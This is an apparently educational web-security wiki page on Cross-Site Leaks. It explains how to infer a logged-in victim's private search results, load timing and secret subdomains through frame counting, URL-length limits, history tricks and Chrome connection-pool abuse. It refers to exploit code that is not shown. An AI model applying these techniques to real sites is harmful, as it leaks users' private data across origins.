XS-Leaks

Leaking information cross-site often through private search features

Cross-Site Leaks (XS-Leaks) are a collection of techniques that allow an attack to infer information of another site. Be it privacy related, or in case of a private search functionality, XS-Search to find full strings character-by-character. The https://xsleaks.dev/ wiki collects a bunch of techniques with clear and concise information and should be your first source. Below are some more detailed explanations and ready-made exploits. As well as some techniques not mentioned there.

Examples

An XS-Leak technique can only return a boolean answer, true or false. The questions we can ask are important to asses the impact. For example:

  • Is the user currently logged in? -> By detecting a redirect to the login page

  • Does the user have access to this group? -> By detecting an access denied page

  • Is there a note containing "a"? -> By counting the number of iframes in search results

This last idea where we are targeting search functionality by far the most powerful, called XS-Search. This has more than privacy implications because once the attacker guesses one correct character, they can expand their guesses from there to find more and more characters that still match results. In the end all data that the search functionality queries can be leaked.

Other use cases of XS-Leaks can be found in CSS Injection, where it is used to exfiltrate the result of selectors with a strict CSP (XS-Leaks without network).

Some techniques require a window reference which can be acquired from calling window.open() or iframing the URL and reading .contentWindow. This techniques work without this though, and even bypass Cross-Origin-Opener-Policy.

One of the most classic techniques involves the window.length property which is exposed cross-origin. It holds the number of frames inside of a window. This includes <iframe> and <embed>/<object> for some specific types.

The above example generates iframes for each search result. So a successful query will have more than an unsuccessful one. We can detect this by opening the search page, waiting for it to load, and checking its .length.

You can then call this test() function with await to learn if the logged-in user has a note containing the query. Do this in a loop for every character, expanding the search each time you find a successful result to leak the full string:

Alternatively, you may also be able to detect the negative result by comparing to 0:

If you are server-side redirected to 2 different length URLs depending on if the search was successful or not, this is detectable using the Max URL Length. If it exceeds 2MB (2097152 characters), the browser will show a failure page at about:blank#blocked which is same-origin with the initiator.

This is vulnerable because we can pad the length of the URL with a hash fragment (#), which are kept across server-side redirects. You have to calculate the amount of padding required to make the shortest of the 2 options barely go through, while the longest gets blocked for going over the limit.

In the above example, /true is shorter than /false. Then after 2 seconds, we check if it's still same-origin or if it successfully went cross-origin.

If your target is iframable (and cookies are SameSite=None), there is a much faster technique possible using the fact that onload= is triggered cross-origin. We can simply load all possible characters at the same time, and only one should trigger the event because it barely successfully navigated. At this point we know the correct character and can continue on to the next.

This writeup shows an implementation of this technique:

Measure top-level load time

It's easy to measure how long it takes to load an iframe using the onload= event. But doing so top-level on a site that doesn't allow iframing is harder, although still possible using this trick.

We essentially let it load, and at the same time perform some hashchanges on it, which don't reload the tab. These should insert history entries, but if the target is busy, they may be skipped. Using history.length it becomes possible to check how many navigations there were, telling us if the target was busy or not at some specific point in time.

It allows you to detect the difference between while (true) {} and while (false) {} on the target. If there is any heavy operation, and you can confidently guess when that will take place on the target, set the loading time to this in the exploit.

Some situations where this can be useful is in detecting ReDoS (Catastrophic Backtracking), because JavaScript's RegExp can be exponential too. Another use case is in querySelector or the similar jQuery implementation, when you have an injection into one of these functions. This can create expensive lookups that short-circuit if a match is found, creating a timing different. This difference is then detectable using the above technique.

More JavaScript execution timing attacks can be found here:

Connection Pool

Chrome limit how many connection can be active at the same time. For HTTP requests, this limit is 6 per origin (origin of the request URL) and 256 globally. Because this limit is shared across sites, an attacker can affect it for the target site and the other way around.

Primitives

To keep the connection pool (almost) full, you should host a server that keeps the connection open for a while. Below is a simple Go server that has some endpoints for sleeping:

Here are some useful functions that all the exploit below will use:

Counting requests

For XS-Leaks, the most useful effect is that if the pool is almost full (-1), the target and the attacker share one single slot for making connections. If the attacker's page keeps sending requests one after the other, measuring the time in between, they can detect whenever the target wants to get in between by making their own requests. With this you can count requests of the target.

Writeup explaining connection pool abuse to count CSS exfiltration requests

Below is an example that measures the time a fetch() takes on a remote website. This can be done by having the target request "stalled" (waiting for a slot to open up). Then open up one slot by calling blocker.abort() to let the target take its spot and immediately start fetching yourself. This resolves the target's fetch first and then starts on our request. If we compare the time that we called the fetch function ourselves, to when its DNS lookup started, we get a precise measurement of how long it was stalled. Meaning how long the target's request took.

The result of 93ms is very close to the real total time the fetch took:

55 + 32 + 5 = 92ms!

Leaking subdomains

The order in which stalled requests are taken from the queue is not a First-In First-Out (FIFO) queue as you may expect it to be. Instead, they are ordered by some arbitrary properties of the request. Firstly, higher priority requests are executed first (table). If these tie, the GroupId (source code) is compared and the smallest goes first.

It consists of the following properties which are all evaluated in order, if any of them tie, it checks the next property.

  1. Port (eg. 80 or 8000)

  2. Scheme ("http" or "https", lexicographically)

  3. Host (eg. sub.example.com, lexicographically)

If the priority, port and scheme are the same, the hosts are compared lexicographically. Remember, this is a comparison between an attacker's request and a target's request, where the attacker can detect if their request was stalled or not.

If the target requested some random secret subdomain, we can compare it with our subdomain to learn its value character by character. That is the idea of this writeup below:

Leak subdomain using connection pool ordering

In terms of the exploit, see their version as well as my version. It will likely take some effort to apply to your use case, but the basic idea is that you need some simple way to trigger the target request repeatedly so you can compare the subdomains.

Delaying timing

One of the simpler uses of the Connection Pool not necessarily related to XS-Leaks, is delaying network requests of other sites. You can completely halt the browser by filling up the connection pool, then let requests go through one by one.

An example is XSS that requires something to go wrong, like a fallback being reached after a timeout of 5 seconds:

You can exploit this by exhausting all by one socket initially, so you can open the target in a new window. Right after its connection is started, we block the connection pool fully, so it cannot load any subresources or perform its /safe navigation. 6 seconds later, we open it up again and the fallback triggers.

Another use case is Client-Side Race Conditions, where there is a specific timing you want your payload to hit which is hard to guess otherwise. An example is a script that fetches data and then saves it again to the current account. An exploit in this case would be:

  1. Fetch data (as victim)

  2. Login CSRF as the attacker

  3. Save data (as attacker)

Then the attacker would be able to read the victim's data. The connection pool will help us get in between. In the following writeup this technique was part of my solution:

Note: during the CTF challenge, I had a weird issue where release_once() would let through more than 1 request. It had to do with many other images being in the queue, which for some reason let more other requests also go at the same time. This was solved by pre-loading the images, which may be possible in your situation.

Last updated